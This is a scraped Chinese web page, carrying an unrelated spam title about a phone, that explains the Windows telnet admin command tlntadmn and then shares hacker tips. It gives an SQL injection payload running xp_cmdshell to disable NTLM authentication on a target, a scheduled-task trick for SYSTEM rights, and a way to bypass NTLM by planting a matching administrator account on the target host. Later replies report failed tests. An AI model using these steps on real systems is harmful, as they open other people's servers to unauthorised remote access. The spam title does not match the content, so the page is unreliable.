神马品牌网红米3s手机怎么拆后盖:tlntadmn的具体用法
来源:百度文库 编辑:神马品牌网 时间:2024/04/28 12:41:33
tlntadmn命令的用法
tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options?
?????????????所有会话用 'all'。
??-s sessionid?????列出会话的信息。
??-k sessionid?????终止会话。
??-m sessionid?????发送消息到会话。
??config????????配置 telnet 服务器参数。
common_options 为:
??-u user??????? 指定要使用其凭据的用户
??-p password????? 用户密码
config_options 为:
? dom = domain????? 设定用户的默认域
? ctrlakeymap = yes|no? 设定 ALT 键的映射
? timeout = hh:mm:ss?? 设定空闲会话超时值
? timeoutactive = yes|no 启用空闲会话。
? maxfail = attempts?? 设定断开前失败的登录企图数。
? maxconn = connections?设定最大连接数。
? port = number?????设定 telnet 端口。
? sec = [+/-]NTLM [+/-]passwd
?????????????设定身份验证机构
? fname = file????? 指定审计文件名。
? fsize = size????? 指定审计文件的最大尺寸(MB)。
? mode = console|stream?指定操作模式。
? auditlocation = eventlog|file|both
?????????????指定记录地点
? audit = [+/-]user [+/-]fail [+/-]admin
?????????????指定审计的事件
今天我给大家介绍我一直在使用的办法,压箱底的哦。
那就是直接运行命令:tlntadmn config sec = -ntlm
注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证:) 赶快去试试吧。
我在命令提示符下运行:tlntadmn config sec = -ntlm 没能成功
如下测试,命令太多打上几个主要的.呵呵
C:\>tlntadmn config sec = -ntlm
错误: 您必须有管理特权
C:\>at 20:43 /interactive "cmd"
新加了一项作业,其作业 ID = 1
C:\WINNT\system32>tlntadmn config sec = -ntlm
错误: 您必须有管理特权
第一个命令我用的是administrator权限,第二个是用at启用一个system的权限.在system权限也没成功.telnet以启用.不知道我作的对吗?
去除NTML验证~ 如果这招不行,可以考虑换个思路
在目标主机上建立好一个管理员用户!
在本机建立一个和目标主机上相同的帐号密码的用户~
在本机CMD上右击选择运行方式~ 输入该帐号和密码~
直接 telnet 目标IP~~~~`` 既可直接饶过NTML验证.
大家都知道的小技巧~ 呵呵!
接着本机测试tlntadmn \\127.0.0.1
成功返回了TLNTADMN的管理界面.但是当我使用
tlntadmn \\127.0.0.1 config sec-ntml
和
tlntadmn \\127.0.0.1 config port=1002
的时候同样返回管理界面.而不是XP下所说的"更新成功",并且其中数据没有被修改.
在没有启动远程注册表服务(REMOTE REGISTRY SERVICES)的情况下连接
tlntadmn \\127.0.0.1
3
7
出现无法读取远程注册表项目的错误,也就是说如果要使用TLNTADMN的远程管理功能,必须对方是启动远程注册表服务.否则免谈.
而网络上的文章指出,2000下的TLNTADMN是不具备远程管理功能的,但是我的2000却成功了(应该算是成功了,因为大家看到起码是可以连接127.0.0.1的注册表,也就是说具备了远程管理的能力),而另一篇文章说有-U 和 -P参数,按照情况来看 -u指的是Username而-p指的是 password.但是我依旧没有成功的使用出这两个参数....情况不明....这里就是我前一些日子里的测试结果.